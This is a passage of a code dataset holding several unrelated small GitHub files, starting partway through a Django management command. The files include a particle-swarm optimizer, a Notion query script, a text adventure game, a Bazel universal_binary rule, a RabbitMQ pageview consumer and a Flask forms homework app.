+{"seq_id":"35041670938","text":"import numpy as np\nfrom subprocess import Popen, PIPE\nimport time\nfrom datetime import date\nfrom os.path import exists\nfrom random import sample\nimport random\n\ndef calculateCost(fitness, P, popSize, lb, ub, process, CORNOT):\n    \"\"\"\n    It calculates the fitness value of each individual in the population\n\n    Parameters\n    ----------\n    fitness : function\n        The objective function selected\n    P : list\n        The list of individuals\n    popSize : int\n        Number of chromosomes in a population\n    lb : list\n        lower bound limit list\n    ub : list\n        upper bound limit list\n    process : Popen\n        The subprocess that calculates the cost\n    CORNOT : bool\n        Use the C++ subprocess or not\n\n    Returns\n    -------\n    list\n        scores : fitness values of all individuals in the population\n    \"\"\"\n    scores = np.full(popSize, 0.0)\n    for i in range(0, popSize):\n        P[i] = np.clip(P[i], lb, ub)\n        if CORNOT == True:\n            scores[i] = fitness(process, P[i, :])\n            if scores[i] == 3:\n                print(P[i, :])\n                print(stdoutreadint(process))\n                print(stdoutreadint(process))\n                print(stdoutreadint(process))\n                exit()\n        else:\n            scores[i] = fitness(P[i, :])\n    return scores\n\ndef PSO(fitness, bound, dim, popSize, iters, CORNOT, best, formulaID, record = False, dataset_size = 0, SHOWBEST = False):\n    \"\"\"\n    This is the main method which implements PSO\n\n    Parameters\n    ----------\n    fitness : function\n        The function/subprocess that returns the fitness\n    bound : list of list\n        The bound limit lists of each dimensions\n    dim : int\n        The dimension of the individuals\n    popSize : int\n        Number of chromosomes in a population\n    iters : int\n        Number of iterations / generations of PSO\n    CORNOT : bool\n        True for use C++ subprocess\n    best : float\n        The best score during the whole experiment\n    formulaID : int\n        The formula ID will be trained\n    record : bool\n        True for record every population and the fitness to ./result/yyyy/mmdd_formulaXX_dataset_size_XX_version\n    dataset_size: int\n        The dataset size for record\n    \"\"\"\n\n\n    start_time = time.time()\n\n    c1_max = 2.5\n    c2_max = 2.5\n    c1_min = 2.5\n    c2_min = 2.5\n    wMax = 0.9\n    wMin = 0.4\n    Vmax = 4\n    process = Popen(['./test', str(formulaID)], stdin=PIPE, stdout=PIPE)\n    print(\"c1 = \", c1_min, \"~\", c1_max, \"\\nc2 = \", c2_min, \"~\", c2_max, \"\\nw = \", wMin, \"~\", wMax, \"\\nVmax = \", Vmax)\n\n    ub = [max(x) for x in bound]\n    lb = [min(x) for x in bound]\n\n    print(\"upper bound:\", ub)\n    print(\"lower bound:\", lb)\n\n    gBest_corr = 0\n    gBest_sm = [0 for x in range(dim)]\n    pBest_corr = [0 for x in range(popSize)]\n    pBest_sm = [[0 for x in range(dim)] for y in range(popSize)]\n    vel = [[0 for x in range(dim)] for y in range(popSize)]\n\n#    P = np.array([[np.random.choice(x) for x in bound] for i in range(popSize)])\n    P = np.zeros((popSize, dim))\n    for i in range(dim):\n        P[:, i] = np.random.uniform(0, 1, popSize) * (ub[i] - lb[i]) + lb[i]\n    pfitness = calculateCost(fitness, P, popSize, lb, ub, process, CORNOT)\n    print(\"PSO is optimizing \\\"\" + fitness.__name__ + \"\\\"\")\n    if record == True:\n        year, month, day = date.today().isoformat().split(\"-\")\n        i = 1\n        record_filename = \"result/\" + year + \"/\" + month + day + \"_formula\" + str(formulaID) + \"_size_\" + str(dataset_size) + \"_\" + str(i)\n        while exists(record_filename):\n            i = i + 1\n            record_filename = \"result/\" + year + \"/\" + month + day + \"_formula\" + str(formulaID) + \"_size_\" + str(dataset_size) + \"_\" + str(i)\n        f = open(record_filename, \"w\")\n        print(\"Record to \" + record_filename)\n\n\n    for i in range(iters):\n        # record the global best and local best of each individuals\n        for popu in range(popSize):\n            if pfitness[popu] > pBest_corr[popu]:\n                pBest_corr[popu] = pfitness[popu]\n                pBest_sm[popu] = P[popu]\n            if pfitness[popu] > gBest_corr:\n                gBest_corr = pfitness[popu]\n                gBest_sm = P[popu]\n        # update the W, c1, c2 of PSO\n        w = wMax - (wMax - wMin) * i / iters\n        c1 = c1_max + ((c1_min - c1_max) / iters) * i\n        c2 = c2_min + ((c2_max - c2_min) / iters) * i\n        # update the velocity and the direction of each individuals\n        for popu in range(popSize):\n            # load current popu\n            current_fitness = pfitness[popu]\n            current_sm = P[popu]\n\n            r1 = random.random()\n            r2 = random.random()\n\n            # update popu vel and position\n            temp_new_sm = [0 for x in range(dim)]\n\n            for d in range(dim):\n                vel[popu][d] = round(w * vel[popu][d] + c1 * r1 * (pBest_sm[popu][d] -\n                    current_sm[d]) + c2 * r2 * (gBest_sm[d] - current_sm[d]))\n\n                if vel[popu][d] > Vmax:\n                    vel[popu][d] = Vmax\n\n                if vel[popu][d] < -Vmax:\n                    vel[popu][d] = -Vmax\n\n                current_sm[d] = current_sm[d] + vel[popu][d]\n        # calculate fitness of each individuals\n        pfitness = calculateCost(fitness, P, popSize, lb, ub, process, CORNOT)\n        # if record is set, record the individuals and their fitness\n        if record == True:\n            for p in range(len(P)):\n                for pop in P[p]:\n                    f.write(str(pop) + ' ')\n                f.write(str(pfitness[p]) + '\\n')\n        # track the best fitness so far; if SHOWBEST is set, print it\n        bestScore = max(pfitness)\n        bestID = np.argmax(pfitness)\n        best_sm = P[bestID]\n        if bestScore < gBest_corr:\n            bestScore = gBest_corr\n            best_sm = gBest_sm\n        if SHOWBEST == True:\n            print(['At iteration ' + str(i + 1) + ' the best fitness is ' + str(bestScore)])\n\n    # print the best fitness of whole iterations\n    print(\"bestScore = \", bestScore)\n    for i in best_sm:\n        print(\"{:.5g}\".format(i), end = \" \")\n    print(\"\")\n    # print the time that iters used\n    print(\"Cost\", time.time() - start_time, \"seconds\")\n    print(\"-------------------------------------\")\n    # if record is set, close the file operation\n    if record == True:\n        f.close()\n    # return the [best fitness, best individual]\n    return [bestScore, best_sm]\n\n\n\n\n\ndef printbestIndividual(ans):\n    l = []\n    for i in ans:\n        l.append(round(i, 4))\n    print('HCP[1]:%.4g'%4)\n    print('HCP[2-8]:%.4g'%l[0])\n    print('HCP[9-10]:%.4g'%l[1])\n    print('HCP[11]:%.4g'%l[2])\n    print('HCP[12]:%.4g'%l[3])\n    print('HCP[13]:%.4g'%l[4])\n    for i in range(5, len(l), 2):\n        print(\"{:.4g} {:.4g}\".format(l[i], l[i + 1]))\n\n\ndef stdoutreadint(process):\n    ret = process.stdout.readline()\n    try:\n        return float(str(ret)[2:-3])\n    except ValueError:\n        return str(ret)\n\ndef listtostdin(l):\n    s = str(l[0])\n    for i in l[1:]:\n        s += \" \" + str(i)\n    s += \"\\n\"\n    return s\n\ndef ObjfCorr(P, l):\n    s = listtostdin(l)\n    P.stdin.write(s.encode())\n    P.stdin.flush()\n    return stdoutreadint(P)\n\n\n\n","repo_name":"zoo868e/bridge","sub_path":"Gameinfo/PTd.py","file_name":"PTd.py","file_ext":"py","file_size_in_byte":7639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"}
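The inner loop above is the standard PSO velocity update, v <- w*v + c1*r1*(pbest - x) + c2*r2*(gbest - x), plus integer rounding and a +/-Vmax clamp specific to this project. A self-contained toy run of the same update rule on the sphere function f(x) = sum(x_i^2), minimizing rather than maximizing, and without the rounding and clamping:

```python
import random

def pso_sphere(dim=3, particles=20, iters=100, w=0.7, c1=1.5, c2=1.5):
    # Minimal PSO sketch: each particle tracks a velocity, its personal best,
    # and is pulled toward the swarm's global best each iteration.
    f = lambda x: sum(v * v for v in x)
    X = [[random.uniform(-5, 5) for _ in range(dim)] for _ in range(particles)]
    V = [[0.0] * dim for _ in range(particles)]
    pbest = [x[:] for x in X]
    gbest = min(pbest, key=f)[:]
    for _ in range(iters):
        for p in range(particles):
            for d in range(dim):
                r1, r2 = random.random(), random.random()
                V[p][d] = (w * V[p][d]
                           + c1 * r1 * (pbest[p][d] - X[p][d])
                           + c2 * r2 * (gbest[d] - X[p][d]))
                X[p][d] += V[p][d]
            if f(X[p]) < f(pbest[p]):
                pbest[p] = X[p][:]
                if f(X[p]) < f(gbest):
                    gbest = X[p][:]
    return gbest, f(gbest)
```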
self.stdout.write(\"already add \"+f[0])\n\n continue;\n for codes in lis:\n for code in codes[1:]:\n if fcode==code:\n print(codes[0])\n\n faculty=get_object_or_404(Faculty,faculty_text=codes[0].strip())\n module=faculty.module_set.create(module_text=f[1],module_code=f[0])\n done =True\n x = 2018\n for count in range(0, 3):\n module.moduleyear_set.create(year=str(x - count) + \"Sem2\")\n module.moduleyear_set.create(year=str(x - count) + \"Sem1\")\n break;\n if done:\n break;\n if done:\n self.stdout.write(self.style.SUCCESS('added '+ f[0]+ \" \"+f[1]))\n else:\n self.stdout.write(\"unable to add \"+f[0])\n","repo_name":"chanqingzhou/forum","sub_path":"myforum/pyp/management/commands/update.py","file_name":"update.py","file_ext":"py","file_size_in_byte":3205,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"22053046293","text":"import glob, os\nfrom multiprocessing.dummy import Pool as ThreadPool\n\ndef ab(i):\n print(f\"starting thread {i}\")\n os.system(f\"source ~/modeltraining/bin/activate && export PYTHONPATH=$PYTHONPATH:~/AnimeGANv2/tools:~/AnimeGANv2:~/modeltraining/lib/python3.8/site-packages && cd ~/AnimeGANv2/tools && python ~/AnimeGANv2/tools/edge_smooth.py --dataset L{i}\")\n print(f\"thread {i} done\")\n\nt =[]\n\nfor j in range (1,13):\n t.append(j)\n\npool = ThreadPool(12)\nblurring = pool.map(ab,t)\npool.close()\npool.join()","repo_name":"Allen050329/handy-tools","sub_path":"blur-mt.py","file_name":"blur-mt.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"13795141761","text":"from notion_client import Client\nimport os\n\n# Script will query notion for 100 songs with the highest rating and output them to a specified file\n\n# ------------------------ SET UP ------------------------\n# You need to create a Notion Integration and share your database with that integration\n# the secret integration token from Notion Integration\nnotion_token = ''\n\n# the database id of your notion songs database\n# get the mess of numbers after the \"/\" and before the \"?\" on your dashboard URL (no need to split into dashes)\ndatabase_id = ''\n\n# absolute path to the desired output file (must also include the file name and extension)\nsong_list_path = ''\n\n# ------------------------ END SET UP ------------------------\n\nos.environ['notion_token'] = notion_token\nnotion = Client(auth=os.environ['notion_token'])\n\n\n# queries top 100 songs from rating S to 3 stars\nmy_page = notion.databases.query(\n **{\n \"database_id\": database_id,\n \"sorts\": [\n {\n \"property\": \"Rating\",\n \"direction\": \"descending\"\n }\n ]\n\n }\n)\n\nresult_list1 = my_page['results']\ntitle_array = []\n\nfor song in result_list1:\n title = ''\n\n try:\n title = song['properties']['Name']['title'][0]['text']['content']\n except:\n title = 'no name'\n\n title_array.append(title)\n\ntitle_array = list(dict.fromkeys(title_array))\n\nwith open(song_list_path, 'w') as f:\n for title in title_array:\n f.write(title + \"\\n\")\n \n","repo_name":"AlexShen101/Notion_YT_Player","sub_path":"Query_Notion_Songs/get_songs_from_notion.py","file_name":"get_songs_from_notion.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"70829429279","text":"# coding:utf-8\n# Created by Equator at 2020/3/25\n# 闭包\ndef count():\n fs = []\n for i in range(1, 4):\n def 
+{"seq_id":"22053046293","text":"import glob, os\nfrom multiprocessing.dummy import Pool as ThreadPool\n\ndef ab(i):\n    print(f\"starting thread {i}\")\n    os.system(f\"source ~/modeltraining/bin/activate && export PYTHONPATH=$PYTHONPATH:~/AnimeGANv2/tools:~/AnimeGANv2:~/modeltraining/lib/python3.8/site-packages && cd ~/AnimeGANv2/tools && python ~/AnimeGANv2/tools/edge_smooth.py --dataset L{i}\")\n    print(f\"thread {i} done\")\n\nt = []\n\nfor j in range(1, 13):\n    t.append(j)\n\npool = ThreadPool(12)\nblurring = pool.map(ab, t)\npool.close()\npool.join()","repo_name":"Allen050329/handy-tools","sub_path":"blur-mt.py","file_name":"blur-mt.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"}
+{"seq_id":"13795141761","text":"from notion_client import Client\nimport os\n\n# Script will query notion for 100 songs with the highest rating and output them to a specified file\n\n# ------------------------ SET UP ------------------------\n# You need to create a Notion Integration and share your database with that integration\n# the secret integration token from Notion Integration\nnotion_token = ''\n\n# the database id of your notion songs database\n# get the string of characters after the \"/\" and before the \"?\" on your dashboard URL (no need to split into dashes)\ndatabase_id = ''\n\n# absolute path to the desired output file (must also include the file name and extension)\nsong_list_path = ''\n\n# ------------------------ END SET UP ------------------------\n\nos.environ['notion_token'] = notion_token\nnotion = Client(auth=os.environ['notion_token'])\n\n\n# queries top 100 songs from rating S to 3 stars\nmy_page = notion.databases.query(\n    **{\n        \"database_id\": database_id,\n        \"sorts\": [\n            {\n                \"property\": \"Rating\",\n                \"direction\": \"descending\"\n            }\n        ]\n\n    }\n)\n\nresult_list1 = my_page['results']\ntitle_array = []\n\nfor song in result_list1:\n    title = ''\n\n    try:\n        title = song['properties']['Name']['title'][0]['text']['content']\n    except (KeyError, IndexError):\n        title = 'no name'\n\n    title_array.append(title)\n\ntitle_array = list(dict.fromkeys(title_array))\n\nwith open(song_list_path, 'w') as f:\n    for title in title_array:\n        f.write(title + \"\\n\")\n    \n","repo_name":"AlexShen101/Notion_YT_Player","sub_path":"Query_Notion_Songs/get_songs_from_notion.py","file_name":"get_songs_from_notion.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"}
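The query above returns at most 100 rows per call because the Notion API is cursor-paginated. A hedged sketch of walking every page with the same `notion_client` object, using the `has_more`/`next_cursor` fields the API returns:

```python
def query_all(notion, database_id, **kwargs):
    # Keep requesting pages until the API reports no more results.
    results, cursor = [], None
    while True:
        if cursor:
            kwargs["start_cursor"] = cursor
        page = notion.databases.query(database_id=database_id, **kwargs)
        results.extend(page["results"])
        if not page.get("has_more"):
            return results
        cursor = page["next_cursor"]
```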
+{"seq_id":"70829429279","text":"# coding:utf-8\n# Created by Equator at 2020/3/25\n# Closures\ndef count():\n    fs = []\n    for i in range(1, 4):\n        def f():\n            return i * i\n\n        fs.append(f)\n    return fs\n\n\n# f1, f2 and f3 each correspond to one of the three elements of the list fs\nf1, f2, f3 = count()\nprint(f1())\nprint(isinstance(f2(), int))\n","repo_name":"libinkai/BookmarkSharer","sub_path":"learn/closureTest.py","file_name":"closureTest.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"}
+{"seq_id":"29026352041","text":"# Sum the three previous cases with a 2-D DP table; to avoid two identical consecutive numbers, a sum ending in j only adds the ways of forming i-j that do not end in j\nimport sys\ninput = sys.stdin.readline\nT = int(input())\nmod = 1000000009\ndp = [[0] * 4 for _ in range(100001)]\ndp[1] = [0, 1, 0, 0]\ndp[2] = [0, 0, 1, 0]\ndp[3] = [0, 1, 1, 1]\nfor i in range(4, 100001):\n    for j in range(1, 4):\n        dp[i][j] = (dp[i-j][1] + dp[i-j][2] + dp[i-j][3] - dp[i-j][j]) % mod\nfor _ in range(T):\n    n = int(input())\n    print(sum(dp[n]) % mod)\n","repo_name":"yyysolhhh/Python_Algorithm","sub_path":"baekjoon/BJ_15990.py","file_name":"BJ_15990.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"}
+{"seq_id":"41172619333","text":"# Justin Burkhalter\n\nprint(\"You have just become a Christian and need to get to the eternal life but satan stands in your way. You need to defeat satan before getting eternal salvation, but first you will need to put on the full armor of God. You will need the breastplate of righteousness to protect you from every spiritual attack, shield of faith to put your personal trust in God, the helmet of salvation to protect your mind, the sword of the Spirit to bring truth and freedom to you, the belt of truth to put your trust in God’s truth, and finally the gospel of peace sandals to take the message of God’s peace to the people around you.\")\n\n# Function showing the goal of the game and move commands\n\n\ndef show_instructions():\n    # print a main menu and the commands\n    # Add later type 'exit' to exit\n    print(\"Move commands: go South, go North, go East, go West\")\n    print(\"Add to Inventory: get 'item name'\")\n\n\n# A dictionary for the eternal life text game\n# The dictionary links a room to other rooms; each 'item' key is the single item found in that room.\nrooms = {\n    \"Jerusalem\": {'South': 'Cenacle', 'North': 'Golgotha', 'West': 'Rome', 'East': 'Praetorium'},\n    'Cenacle': {'North': 'Jerusalem', 'East': 'Nazareth', 'item': 'Gospel of Peace Sandals'},\n    'Nazareth': {'West': 'Cenacle', 'item': 'Sword of the Spirit'},\n    'Rome': {'East': 'Jerusalem', 'item': 'Shield of Faith'},\n    'Golgotha': {'East': 'Gethsemane', 'item': 'Belt of Truth', 'South': 'Jerusalem'},\n    'Gethsemane': {'West': 'Golgotha', 'item': 'Helmet of Salvation'},\n    'Praetorium': {'West': 'Jerusalem', 'North': 'Eternal Life', 'item': 'satan'},\n    'Eternal Life': {'South': 'Praetorium', 'item': 'Breastplate of Righteousness'}\n    # add more rooms and directions here\n}\n\n\n# Show the players status by identifying the room they are currently in\n# showing a list of their inventory of items, and displaying the item in their current room.\ndef show_status(inventory, current_room):\n    print(\"Inventory\", inventory)\n    print(\"You are in the\", current_room)\n    item = rooms[current_room].get('item')\n    if item and item not in inventory:\n        print(\"You see the\", item)\n\n\ndef main():\n    directions = ('go South', 'go North', 'go East', 'go West')\n    inventory = []  # list to add the items\n    current_room = \"Jerusalem\"  # starting room\n    show_instructions()  # print main game instructions\n\n    while True:  # unless user enters Exit, the loop will run\n\n        # show instructions and status\n        show_status(inventory, current_room)\n\n        # reads user input like go South etc\n        user_input = input(\"\\nEnter your move: \")\n        if user_input.lower() == 'exit':\n            print(\"Thanks for playing\")\n            break  # exit\n\n        # breaks the user input to remove word 'go'\n        user_input = user_input.strip().split(' ', 1)\n        if len(user_input) > 1:  # If statement that checks the length of the input\n            action = user_input[0]\n            target = user_input[1]\n        else:\n            print(\"Invalid input\")\n            continue\n\n        valid_objects = rooms[current_room].keys()\n        if action == 'go':\n            direction = target.capitalize()\n            if direction in valid_objects:  # if the given room has this direction, continue\n                # change the start_room after moving\n                current_room = rooms[current_room][direction]\n                print(\"You enter the\", current_room)\n\n            else:\n                # if direction is not present for current_room in rooms dictionary,\n                print('Invalid direction!')\n\n        elif action == 'get':\n            item = rooms[current_room].get('item')\n            if item not in inventory:\n                inventory.append(item)  # add the item to the inventory\n                # remove it from the current room\n                rooms[current_room]['item'] = None\n            else:\n                print(\"You already have the\", item)\n        else:\n            print(\"Invalid input\")\n\n        if current_room == 'Eternal Life':  # reaching the goal room ends the game\n            if len(inventory) == 6:\n                print(\"win\")\n            else:\n                print(\"lose\")\n            break  # if you win/lose, then you dont want to ask for input again at the start of the loop\n\n\nmain()  # go!\n","repo_name":"JB0610/EternalLifeGame","sub_path":"TextBasedGame.py","file_name":"TextBasedGame.py","file_ext":"py","file_size_in_byte":4305,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"}
+{"seq_id":"74608019037","text":"load(\"@bazel_skylib//lib:dicts.bzl\", \"dicts\")\nload(\"//lib:apple_support.bzl\", \"apple_support\")\nload(\"//lib:lipo.bzl\", \"lipo\")\nload(\"//lib:transitions.bzl\", \"macos_universal_transition\")\n\ndef _universal_binary_impl(ctx):\n    inputs = [\n        binary.files.to_list()[0]\n        for binary in ctx.split_attr.binary.values()\n    ]\n\n    if not inputs:\n        fail((\"Target (%s) `binary` label ('%s') does not provide any \" +\n              \"file for universal binary\") % (ctx.attr.name, ctx.attr.binary))\n\n    output = ctx.actions.declare_file(ctx.label.name)\n\n    if len(inputs) > 1:\n        lipo.create(\n            actions = ctx.actions,\n            apple_fragment = ctx.fragments.apple,\n            inputs = inputs,\n            output = output,\n            xcode_config = ctx.attr._xcode_config[apple_common.XcodeVersionConfig],\n        )\n\n    else:\n        # If the transition doesn't split, this is building for a non-macOS\n        # target, so just create a symbolic link of the input binary.\n        ctx.actions.symlink(target_file = inputs[0], output = output)\n\n    runfiles = ctx.runfiles(files = ctx.files.binary)\n    transitive_runfiles = [\n        binary[DefaultInfo].default_runfiles\n        for binary in ctx.split_attr.binary.values()\n    ]\n    runfiles = runfiles.merge_all(transitive_runfiles)\n\n    return [\n        DefaultInfo(\n            executable = output,\n            files = depset([output]),\n            runfiles = runfiles,\n        ),\n    ]\n\nuniversal_binary = rule(\n    attrs = dicts.add(\n        apple_support.action_required_attrs(),\n        {\n            \"binary\": attr.label(\n                cfg = macos_universal_transition,\n                doc = \"Target to generate a 'fat' binary from.\",\n                mandatory = True,\n            ),\n            \"_allowlist_function_transition\": attr.label(\n                default = \"@bazel_tools//tools/allowlists/function_transition_allowlist\",\n            ),\n        },\n    ),\n    doc = \"\"\"\nThis rule produces a multi-architecture (\"fat\") binary targeting Apple macOS\nplatforms *regardless* of the architecture of the macOS host platform. The\n`lipo` tool is used to combine built binaries of multiple architectures. For\nnon-macOS platforms, this simply creates a symbolic link of the input\nbinary.\n\"\"\",\n    executable = True,\n    fragments = [\"apple\"],\n    implementation = _universal_binary_impl,\n)\n","repo_name":"bazelbuild/apple_support","sub_path":"rules/universal_binary.bzl","file_name":"universal_binary.bzl","file_ext":"bzl","file_size_in_byte":2374,"program_lang":"python","lang":"en","doc_type":"code","stars":67,"dataset":"github-code","pt":"51"}
+{"seq_id":"35682310624","text":"import pika, sys, os, wikipedia, pageviewapi.period\r\n\r\ndef main():\r\n\r\n    # Connect to the RabbitMQ server\r\n    connection = pika.BlockingConnection(pika.ConnectionParameters(host='localhost'))\r\n    channel = connection.channel()\r\n\r\n    # Make sure the queue exists\r\n    channel.queue_declare(queue='WikipediaVisitas')\r\n\r\n    def callback(ch, method, properties, body):\r\n        count = pageviewapi.period.sum_last(\"en.wikipedia\", body.decode(), last=365)  # look up how many views the search term got\r\n        # Set to English Wikipedia because of problems when testing the API\r\n        \r\n        #count = 10  # queue cleanup\r\n\r\n        # Print the number of views\r\n        print(\" [x] Received %r\" % body + \". Views for this term over the last days: \" + str(count))\r\n\r\n    # Consume the query from RabbitMQ\r\n    channel.basic_consume(queue='WikipediaVisitas', on_message_callback=callback, auto_ack=True)\r\n\r\n    print(' [*] Waiting for messages. To exit press CTRL+C')\r\n    channel.start_consuming()\r\n\r\n\r\n    # Infinite loop\r\nif __name__ == '__main__':\r\n    try:\r\n        main()\r\n    except KeyboardInterrupt:\r\n        print('Interrupted')\r\n        try:\r\n            sys.exit(0)\r\n        except SystemExit:\r\n            os._exit(0)","repo_name":"WsDoragon/INFO229","sub_path":"Tutorial3/consumerVisitas.py","file_name":"consumerVisitas.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"}
+{"seq_id":"34894837293","text":"from flask import Flask, request, render_template\nimport random\n\napp = Flask(__name__)\n\ndef sort_letters(message):\n    \"\"\"A helper method to sort the characters of a string in alphabetical order\n    and return the new string.\"\"\"\n    return ''.join(sorted(list(message)))\n\n\n@app.route('/')\ndef homepage():\n    \"\"\"A homepage with handy links for your convenience.\"\"\"\n    return render_template('home.html')\n\n@app.route('/froyo')\ndef choose_froyo():\n    \"\"\"Shows a form to collect the user's Fro-Yo order.\"\"\"\n    return render_template('froyo_form.html')\n    # Below is the previous version of this function\n    # \n    # return \"\"\"\n    # <form action=\"/froyo_results\" method=\"GET\">\n    #     What is your favorite Fro-Yo flavor?<br/>\n    #     <input type=\"text\" name=\"flavor\"><br/>\n    #     What are your favorite Fro-Yo toppings?<br/>\n    #     <input type=\"text\" name=\"toppings\"><br/>\n    #     <input type=\"submit\" value=\"Submit!\">\n    # </form>\n    # \"\"\"\n\n@app.route('/froyo_results')\ndef show_froyo_results():\n    \"\"\"Shows the user what they ordered from the previous page.\"\"\"\n    context = {\n        \"users_froyo_flavor\": request.args.get('flavor'),\n        \"users_froyo_toppings\": request.args.get('toppings')\n    }\n    return render_template('froyo_results.html', **context)\n    # Below is the previous version of this function\n    # \n    # users_froyo_flavor = request.args.get('flavor')\n    # users_froyo_toppings = request.args.get('toppings')\n    # return f'You ordered {users_froyo_flavor} flavored Fro-Yo with {users_froyo_toppings} toppings!'\n\n@app.route('/favorites')\ndef favorites():\n    \"\"\"Shows the user a form to choose their favorite color, animal, and city.\"\"\"\n    return \"\"\"\n    <form action=\"/favorites_results\" method=\"GET\">\n        What is your favorite color?<br/>\n        <input type=\"text\" name=\"color\"><br/>\n        What is your favorite animal?<br/>\n        <input type=\"text\" name=\"animal\"><br/>\n        What is your favorite city?<br/>\n        <input type=\"text\" name=\"city\"><br/>\n        <input type=\"submit\" value=\"Submit!\">\n    </form>\n    \"\"\"\n\n@app.route('/favorites_results')\ndef favorites_results():\n    \"\"\"Shows the user a nice message using their form results.\"\"\"\n    users_fav_color = request.args.get('color')\n    users_fav_animal = request.args.get('animal')\n    users_fav_city = request.args.get('city')\n    return f\"Wow, I didn't know {users_fav_color} {users_fav_animal}s lived in {users_fav_city}!\"\n\n@app.route('/secret_message')\ndef secret_message():\n    \"\"\"Shows the user a form to collect a secret message. Sends the result via\n    the POST method to keep it a secret!\"\"\"\n    return \"\"\"\n    <form action=\"/message_results\" method=\"POST\">\n        Enter your secret message below:<br/>\n        <input type=\"text\" name=\"message\"><br/>\n        <input type=\"submit\" value=\"Submit!\">\n    </form>\n    \"\"\"\n\n@app.route('/message_results', methods=['POST'])\ndef message_results():\n    \"\"\"Shows the user their message, with the letters in sorted order.\"\"\"\n    # Retrieve the message with `request.form.get()` because POST request used\n    input_message = request.form.get('message')\n    # Sort the message by calling the helper function defined at the top of the file\n    sorted_message = sort_letters(input_message)\n    return f\"Here's your encrypted secret message: {sorted_message}\"\n\n@app.route('/calculator')\ndef calculator():\n    \"\"\"Shows the user a form to enter 2 numbers and an operation.\"\"\"\n    return render_template('calculator_form.html')\n    # Below is the previous version of this function\n    # \n    # return \"\"\"\n    # <form action=\"/calculator_results\" method=\"GET\">\n    #     Please enter 2 numbers and select an operator.<br/><br/>\n    #     <input type=\"number\" name=\"operand1\">\n    #     <select name=\"operation\"> <option value=\"add\">+</option> <option value=\"subtract\">-</option> <option value=\"multiply\">*</option> <option value=\"divide\">/</option> </select>\n    #     <input type=\"number\" name=\"operand2\">\n    #     <input type=\"submit\" value=\"Submit!\">\n    # </form>\n    # \"\"\"\n\n@app.route('/calculator_results')\ndef calculator_results():\n    \"\"\"Shows the user the result of their calculation.\"\"\"\n    # Retrieve the two operands and cast them as integers and retrieve the operation selected from the drop-down menu\n    context = {\n        'operand1': int(request.args.get('operand1')),\n        'operand2': int(request.args.get('operand2')),\n        'operation': request.args.get('operation')\n    }\n    # Compute the calculation based on the operation selected and add the result to the `context` dictionary\n    if context['operation'] == \"add\":\n        context['result'] = context['operand1'] + context['operand2']\n    elif context['operation'] == \"subtract\":\n        context['result'] = context['operand1'] - context['operand2']\n    elif context['operation'] == \"multiply\":\n        context['result'] = context['operand1'] * context['operand2']\n    elif context['operation'] == \"divide\":\n        context['result'] = context['operand1'] / context['operand2']\n\n    return render_template('calculator_results.html', **context)\n    # Below is the previous version of this function\n    # \n    # # Retrieve the two operands and cast them as integers\n    # operand1 = int(request.args.get('operand1'))\n    # operand2 = int(request.args.get('operand2'))\n    # # Retrieve the operation selected from the drop-down menu\n    # operation = request.args.get('operation')\n    # # Compute the calculation based on the operation selected\n    # if operation == \"add\":\n    #     result = operand1 + operand2\n    # elif operation == \"subtract\":\n    #     result = operand1 - operand2\n    # elif operation == \"multiply\":\n    #     result = operand1 * operand2\n    # elif operation == \"divide\":\n    #     result = operand1 / operand2\n    # return f\"You chose to {operation} {operand1} and {operand2}. Your result is: {result}.\"\n    \n\n\n# List of compliments to be used in the `compliments_results` route (feel free \n# to add your own!) \n# https://systemagicmotives.com/positive-adjectives.htm\nlist_of_compliments = [\n    'awesome',\n    'beatific',\n    'blithesome',\n    'conscientious',\n    'coruscant',\n    'erudite',\n    'exquisite',\n    'fabulous',\n    'fantastic',\n    'gorgeous',\n    'indubitable',\n    'ineffable',\n    'magnificent',\n    'outstanding',\n    'propitious',\n    'remarkable',\n    'spectacular',\n    'splendiferous',\n    'stupendous',\n    'super',\n    'upbeat',\n    'wondrous',\n    'zoetic'\n]\n\n@app.route('/compliments')\ndef compliments():\n    \"\"\"Shows the user a form to get compliments.\"\"\"\n    return render_template('compliments_form.html')\n\n@app.route('/compliments_results')\ndef compliments_results():\n    \"\"\"Show the user some compliments.\"\"\"\n    # Save keys and values from compliments_form.html\n    context = {\n        'users_name': request.args.get('users_name'),\n        'wants_compliments': request.args.get('wants_compliments'),\n        'num_compliments': int(request.args.get('num_compliments'))\n    }\n    # Append the dictionary with a random sample of compliments (dictionary name cannot be called before initialization)\n    context['random_compliments'] = random.sample(list_of_compliments, k=context['num_compliments'])\n\n    return render_template('compliments_results.html', **context)\n\n\nif __name__ == '__main__':\n    app.run()\n","repo_name":"GSPuniani/Homework-2-Forms","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"}
